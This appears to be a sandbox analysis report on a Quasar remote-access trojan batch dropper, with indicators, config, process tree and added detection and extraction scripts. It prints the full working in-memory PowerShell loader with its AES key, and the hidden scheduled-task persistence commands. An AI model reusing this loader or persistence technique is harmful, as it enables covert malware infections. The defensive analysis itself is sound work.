Analysis
- max time kernel: 35s
- max time network: 36s
- platform: windows10-2004_x64
- resource: win10v2004-20240412-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240412-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 21-04-2024 01:20
- Static task: static1
General
- Target: Uni.bat
- Size: 1.8MB
- MD5: 14516087f9549022d5582272910428b1
- SHA1: 53324370839fa1c07bfa42cf7cb3039513805d42
- SHA256: 745517dc1c6f989b9882959b31d34621c3a25dde79054f29ff6d7539a603ea3e
- SHA512: cda051bfe205763fe10c9b6970e3b56c4a6044d42d30c8f5ff1b722318c3b69aa1e86c898f4cb70d6e9c4846db8701e7c85b31c4356bf88ca1a8915bb2e0250f
- SSDEEP: 24576:Kn1j2//LtzVBqLoCQw/376Fx2S6aryOdijwog7h66zQIG9GcQ0clANNPny:KdMW+wf+UAwIvczy
Malware Config
Extracted
- Family: quasar
- Version: 1.4.1
- Botnet: SLAVE
- C2: uk2.localto.net:39077
- Mutex: cc0a2b76-665e-4e16-b318-5ee02270fbcd
- encryption_key: D7F09F1F0B9CECC640BA0B3D8975FBE5CED725B5
- install_name: UpdateHost.exe
- log_directory: Error Logs
- reconnect_delay: 3000
- startup_key: WOS64
- subdirectory: Windows

The install-related fields match what the run below shows: the client installs itself to %APPDATA%\Windows\UpdateHost.exe (subdirectory plus install_name) and registers a logon task named WOS64 (startup_key). The C2 host is a localto.net tunnel hostname, so the real operator address is not visible from this config.
Signatures
- Quasar payload (1 IoC)
  - yara rule family_quasar matched resource behavioral1/memory/4960-54-0x00000257BB840000-0x00000257BBB64000-memory.dmp (the 3.1MB region of powershell.exe PID 4960, i.e. the client ran in memory inside PowerShell, not from the dropped UpdateHost.exe)
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely a geofence check.
  - WScript.exe queried key value \REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\Control Panel\International\Geo\Nation
- Executes dropped EXE (1 IoC)
  - PID 764 UpdateHost.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Modifies registry class (1 IoC)
  - powershell.exe created key \REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000_Classes\Local Settings
- Suspicious behavior: EnumeratesProcesses (8 IoCs)
  - PID 4780 powershell.exe, PID 4496 powershell.exe, PID 4960 powershell.exe, PID 764 UpdateHost.exe (each recorded twice)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  - PID 4780 powershell.exe: SeDebugPrivilege
  - PID 4496 powershell.exe (the Register-ScheduledTask process): SeDebugPrivilege, then three passes over the full set SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36. The listing stops at the report's 64-entry cap partway through the third pass (after 35). Entries 33 to 36 are the raw privilege LUIDs for SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege and SeDelegateSessionUserImpersonatePrivilege.
- Suspicious use of WriteProcessMemory (14 IoCs; every write is logged twice, so these are 7 parent-to-child relationships)
  - PID 2028 cmd.exe wrote to PID 4780 powershell.exe
  - PID 4780 powershell.exe wrote to PID 4496 powershell.exe
  - PID 4780 powershell.exe wrote to PID 2884 WScript.exe
  - PID 2884 WScript.exe wrote to PID 2060 cmd.exe
  - PID 2060 cmd.exe wrote to PID 4960 powershell.exe
  - PID 4960 powershell.exe wrote to PID 3368 schtasks.exe
  - PID 4960 powershell.exe wrote to PID 764 UpdateHost.exe
- Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
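Both persistence mechanisms in this run have the same shape: a logon-triggered task, RunLevel Highest, whose action lives under the user's AppData (RuntimeBroker_startup_539_str pointing at startup_str_539.vbs, created with Register-ScheduledTask -AtLogon -RunLevel Highest; WOS64 pointing at UpdateHost.exe, created with schtasks /sc ONLOGON /rl HIGHEST). Note that the elevated run level was granted silently only because the sandbox's Admin user is an administrator; on a standard account the same commands would not yield an elevated task. The hunt below is an added example for triaging a suspect host, not part of the sandbox report and not the sample's code. It assumes the ScheduledTasks module (Windows 8 / Server 2012 and later) and an elevated session if you want to see tasks registered by other users; the task names and the UpdateHost.exe hash are the ones reported on this page and will differ for other builds.

```powershell
# Added example: hunt for the two persistence artefacts this sample leaves behind.
function Find-SuspiciousLogonTask {
    param(
        # Anything a logon task executes from a user profile's AppData or a Temp directory is
        # suspect; the pattern matches every user's profile, not only the current one.
        [string]$UserWritablePattern = '(?i)\\(Users\\[^\\]+\\AppData|Temp)\\',
        # Exact task names from this run. Cheap for an operator to rotate, so only a bonus signal.
        [string[]]$KnownNames = @('WOS64', 'RuntimeBroker_startup_539_str')
    )
    foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
        # Both tasks fire at logon (schtasks /sc ONLOGON, New-ScheduledTaskTrigger -AtLogon).
        $logon = @($task.Triggers | Where-Object { $_.CimClass.CimClassName -eq 'MSFT_TaskLogonTrigger' })
        if ($logon.Count -eq 0) { continue }
        foreach ($action in @($task.Actions)) {
            if (-not $action.Execute) { continue }
            $cmd = [Environment]::ExpandEnvironmentVariables(("{0} {1}" -f $action.Execute, $action.Arguments).Trim())
            $reasons = @()
            if ($KnownNames -contains $task.TaskName) { $reasons += 'task name matches sample IOC' }
            if ($cmd -match $UserWritablePattern)     { $reasons += 'runs from a user-writable directory' }
            # The first task here points straight at a .vbs; Task Scheduler hands it to wscript.exe.
            if ($cmd -match '(?i)\.(vbs|js|bat|cmd|ps1)(\s|"|$)') { $reasons += 'action is a script file' }
            if ($reasons.Count -gt 0 -and $task.Principal.RunLevel -eq 'Highest') { $reasons += 'RunLevel Highest' }
            if ($reasons.Count -eq 0) { continue }
            [pscustomobject]@{
                TaskName = $task.TaskName
                TaskPath = $task.TaskPath
                State    = $task.State
                RunLevel = $task.Principal.RunLevel
                Command  = $cmd
                Reasons  = ($reasons -join '; ')
            }
        }
    }
}

# Second artefact: the installed client at the path derived from the extracted config
# (%APPDATA% + subdirectory 'Windows' + install_name 'UpdateHost.exe'), checked for every profile.
function Find-QuasarInstall {
    Get-ChildItem -Path 'C:\Users\*\AppData\Roaming\Windows\UpdateHost.exe' -ErrorAction SilentlyContinue |
        ForEach-Object {
            $hash = (Get-FileHash -Algorithm SHA256 -LiteralPath $_.FullName).Hash
            [pscustomobject]@{
                Path          = $_.FullName
                Bytes         = $_.Length
                SHA256        = $hash
                # SHA256 of UpdateHost.exe from the Downloads section of this report.
                MatchesSample = ($hash -eq '9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F')
            }
        }
}

Find-SuspiciousLogonTask | Format-Table -AutoSize
Find-QuasarInstall       | Format-Table -AutoSize
```

The name list and the hash only confirm this exact build; the durable detection is the combination of a logon trigger, a highest run level and an action under a user-writable path, which is what the first function keys on.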
Processes
(PIDs are taken from the WriteProcessMemory records above; nesting follows the sandbox's depth markers.)

1. C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"  (PID 2028)
   - Suspicious use of WriteProcessMemory

   2. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command <stage-1 loader>  (PID 4780)
      The -command argument, reflowed from the captured one-liner (only whitespace added). The indexing tricks 'gnirtS46esaBmorF'[-1..-16] -join '', 'txeTllAdaeR'[-1..-11] -join '' and 'daoL'[-1..-4] -join '' reverse the strings at run time into the .NET member names FromBase64String, ReadAllText and Load, so those names never appear literally in the command line; the AES key and IV, however, are embedded in clear.
        function decrypt_function($param_var){
          $aes_var=[System.Security.Cryptography.Aes]::Create();
          $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;
          $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;
          $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uJuitVGk2ro0N3Dl271h/Nt65v72klQHrojzsETrplQ=');
          $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qR1c+BKza1ywPSpxU3Z8Bw==');
          $decryptor_var=$aes_var.CreateDecryptor();
          $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length);
          $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}
        function decompress_function($param_var){
          $pjeaJ=New-Object System.IO.MemoryStream(,$param_var);
          $sIcuP=New-Object System.IO.MemoryStream;
          $RYqCQ=New-Object System.IO.Compression.GZipStream($pjeaJ, [IO.Compression.CompressionMode]::Decompress);
          $RYqCQ.CopyTo($sIcuP); $RYqCQ.Dispose(); $pjeaJ.Dispose(); $sIcuP.Dispose(); $sIcuP.ToArray();}
        function execute_function($param_var,$param2_var){
          $fRWeF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var);
          $uxOtv=$fRWeF.EntryPoint;
          $uxOtv.Invoke($null, $param2_var);}
        $host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';
        $gcCqD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);
        foreach ($wdeYw in $gcCqD) { if ($wdeYw.StartsWith(':: ')) { $YNizn=$wdeYw.Substring(3); break; }}
        $payloads_var=[string[]]$YNizn.Split('\');
        $payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));
        $payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));
        execute_function $payload1_var $null;
        execute_function $payload2_var (,[string[]] (''));
      In short: the loader re-reads its own .bat file, takes the first line that starts with ':: ' (a batch comment, so cmd.exe ignores it), splits it on '\' into two base64 blobs, base64-decodes, AES-CBC-decrypts and gunzips each one, and invokes the entry point of each resulting .NET assembly in-process via Assembly.Load (the second with an empty string[] args array). Nothing decrypted touches disk.
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      3. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_539_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_539.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force  (PID 4496)
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken

      3. "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_539.vbs"  (PID 2884)
         - Checks computer location settings
         - Suspicious use of WriteProcessMemory

         4. C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_539.bat" "  (PID 2060)
            - Suspicious use of WriteProcessMemory

            5. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command <stage-2 loader>  (PID 4960)
               The command line is identical to the stage-1 loader above except that both path literals (the $host.UI.RawUI.WindowTitle value and the ReadAllText argument) are C:\Users\Admin\AppData\Roaming\startup_str_539.bat. That file is a byte-identical copy of Uni.bat (same hashes, see Downloads), so the persistence chain simply re-runs the original dropper from %APPDATA% at every logon. This is the process in which the family_quasar yara rule matched.
               - Suspicious behavior: EnumeratesProcesses
               - Suspicious use of WriteProcessMemory

               6. "schtasks" /create /tn "WOS64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe" /rl HIGHEST /f  (PID 3368)
                  - Creates scheduled task(s)

               6. "C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe"  (PID 764)
                  - Executes dropped EXE
                  - Suspicious behavior: EnumeratesProcesses
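Because the loader carries its AES key and IV in clear and uses standard .NET primitives, the two stages can be recovered statically without ever running the sample. The script below is an added example for that purpose, not the sample's code and not part of the sandbox report: it replays decrypt_function and decompress_function from the captured command line with the same key and IV, but never calls Assembly.Load, writing each stage to disk instead. The script file name Extract-BatStages.ps1 and the stageN.bin output names are assumptions for illustration; the key, IV and ':: ' marker convention are exactly those on this page.

```powershell
<#
Added example: static stage extractor for the AES-CBC + GZip loader captured above.
Usage (hypothetical file name):  .\Extract-BatStages.ps1 -BatPath .\Uni.bat -OutDir .\extracted
#>
param(
    [Parameter(Mandatory)][string]$BatPath,   # local copy of Uni.bat or startup_str_539.bat
    [string]$OutDir = '.\extracted'
)

# Key and IV exactly as embedded in the loader (only the method names were obfuscated, not the key).
$AesKey = [Convert]::FromBase64String('uJuitVGk2ro0N3Dl271h/Nt65v72klQHrojzsETrplQ=')
$AesIV  = [Convert]::FromBase64String('qR1c+BKza1ywPSpxU3Z8Bw==')

function Unprotect-Stage([byte[]]$Cipher) {
    # AES-256-CBC with PKCS7 padding, mirroring decrypt_function.
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $aes.Key = $AesKey
        $aes.IV  = $AesIV
        $dec = $aes.CreateDecryptor()
        try { return ,$dec.TransformFinalBlock($Cipher, 0, $Cipher.Length) }
        finally { $dec.Dispose() }
    } finally { $aes.Dispose() }
}

function Expand-Stage([byte[]]$GzipBytes) {
    # GZip decompression, mirroring decompress_function.
    $in  = New-Object System.IO.MemoryStream(,$GzipBytes)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($in, [IO.Compression.CompressionMode]::Decompress)
    try { $gz.CopyTo($out); return ,$out.ToArray() }
    finally { $gz.Dispose(); $in.Dispose(); $out.Dispose() }
}

# The loader reads its own file, takes the first line beginning with ':: ' (a batch comment, so
# cmd.exe skips it) and splits the remainder on '\' into one base64 blob per stage.
$marker = Get-Content -LiteralPath $BatPath | Where-Object { $_.StartsWith(':: ') } | Select-Object -First 1
if (-not $marker) { throw "No ':: ' payload line found in $BatPath" }
$blobs = $marker.Substring(3).Split('\') | Where-Object { $_ }

# Use an absolute output path: [IO.File] resolves relative paths against the .NET working
# directory, which is not necessarily the current PowerShell location.
$OutDir = (New-Item -ItemType Directory -Force -Path $OutDir).FullName

$stage = 0
foreach ($b64 in $blobs) {
    $stage++
    $bytes = Expand-Stage (Unprotect-Stage ([Convert]::FromBase64String($b64)))
    $path  = Join-Path $OutDir ("stage{0}.bin" -f $stage)
    [IO.File]::WriteAllBytes($path, $bytes)
    [pscustomobject]@{
        Stage  = $stage
        Bytes  = $bytes.Length
        IsPE   = ($bytes.Length -ge 2 -and $bytes[0] -eq 0x4D -and $bytes[1] -eq 0x5A)   # 'MZ' header
        SHA256 = (Get-FileHash -Algorithm SHA256 -LiteralPath $path).Hash
        Path   = $path
    }
}
```

Run it on an isolated analysis box; the output files are the decrypted .NET assemblies that the loader would otherwise have executed in memory (the loader invokes two, so expect two stages), and they can be handed to a .NET decompiler or scanned with the same family_quasar rule that fired on PID 4960's memory.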
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (CLR usage log written by PowerShell itself, not sample content)
  Filesize: 3KB
  MD5: 661739d384d9dfd807a089721202900b
  SHA1: 5b2c5d6a7122b4ce849dc98e79a7713038feac55
  SHA256: 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
  SHA512: 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (PowerShell startup cache, not sample content)
  Filesize: 1KB
  MD5: 4d2c8d8bf93f9450f044c6ef5dff215a
  SHA1: 4d6ecc646ee6c124aaf7535c1387445e02734750
  SHA256: e77daf5c774ba87a166ccd95c40a7211f605316321e1d421b82fb0fc8ed75eb0
  SHA512: c75903513f87ba5fb4da3e19b079be8ba1f451e1f503ed9fdcf3dee82ce9605b87af560a120156a09b3842cdf0c42fb20f7c8cd242e3021d644e959c8536c0aa
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w0cqajya.fyu.ps1 (PowerShell's own script-policy probe, written at startup, not sample content)
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe (the installed Quasar client; install path matches the extracted config)
  Filesize: 442KB
  MD5: 04029e121a0cfa5991749937dd22a1d9
  SHA1: f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
  SHA256: 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
  SHA512: 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
- C:\Users\Admin\AppData\Roaming\startup_str_539.bat (byte-identical copy of Uni.bat: same size and hashes as the submitted sample)
  Filesize: 1.8MB
  MD5: 14516087f9549022d5582272910428b1
  SHA1: 53324370839fa1c07bfa42cf7cb3039513805d42
  SHA256: 745517dc1c6f989b9882959b31d34621c3a25dde79054f29ff6d7539a603ea3e
  SHA512: cda051bfe205763fe10c9b6970e3b56c4a6044d42d30c8f5ff1b722318c3b69aa1e86c898f4cb70d6e9c4846db8701e7c85b31c4356bf88ca1a8915bb2e0250f
- C:\Users\Admin\AppData\Roaming\startup_str_539.vbs (the 115-byte launcher run by the RuntimeBroker_startup_539_str task; per the process tree it starts cmd.exe /c on startup_str_539.bat)
  Filesize: 115B
  MD5: 335912c92f960bed6de5a2807d0c06e8
  SHA1: 0fc47a61e5ebaf37a0d9b147811b7fcf3f6bdfb5
  SHA256: fff158e9c023a9497f4d3379766720928d815cdf3bf48ea947f51d9db3c8f6ea
  SHA512: f0b7cf73a094d5765431e18ae71d5084d62aa392676342a3b197e98297f43c8ffa3a086406b568eda5cf3b4864fd192253602fc0baa9153599beb99252b657a6

Memory dumps (grouped by PID; the same 10.8MB mapping at 0x00007FF976AA0000-0x00007FF977561000 appears in every PowerShell process and in UpdateHost.exe)
- PID 764 (UpdateHost.exe)
  - memory/764-70, memory/764-76: 0x00007FF976AA0000-0x00007FF977561000 (10.8MB)
  - memory/764-71, memory/764-77, memory/764-78: 0x0000020E9E1D0000-0x0000020E9E1E0000 (64KB)
  - memory/764-72: 0x0000020EA0390000-0x0000020EA03D4000 (272KB)
  - memory/764-73: 0x0000020EA06B0000-0x0000020EA0726000 (472KB)
- PID 4496 (powershell.exe, Register-ScheduledTask)
  - memory/4496-16, memory/4496-31: 0x00007FF976AA0000-0x00007FF977561000 (10.8MB)
  - memory/4496-17, memory/4496-27, memory/4496-28: 0x000002257E830000-0x000002257E840000 (64KB)
- PID 4780 (powershell.exe, stage-1 loader)
  - memory/4780-5: 0x000002AFED050000-0x000002AFED072000 (136KB)
  - memory/4780-10, memory/4780-53: 0x00007FF976AA0000-0x00007FF977561000 (10.8MB)
  - memory/4780-11, memory/4780-12: 0x000002AFEAD10000-0x000002AFEAD20000 (64KB)
  - memory/4780-13: 0x000002AFED040000-0x000002AFED048000 (32KB)
  - memory/4780-14: 0x000002AFED280000-0x000002AFED3D8000 (1.3MB)
- PID 4960 (powershell.exe, stage-2 loader)
  - memory/4960-46, memory/4960-74: 0x00007FF976AA0000-0x00007FF977561000 (10.8MB)
  - memory/4960-50, memory/4960-51, memory/4960-55: 0x00000257B92C0000-0x00000257B92D0000 (64KB)
  - memory/4960-54: 0x00000257BB840000-0x00000257BBB64000 (3.1MB); this is the region the family_quasar yara rule matched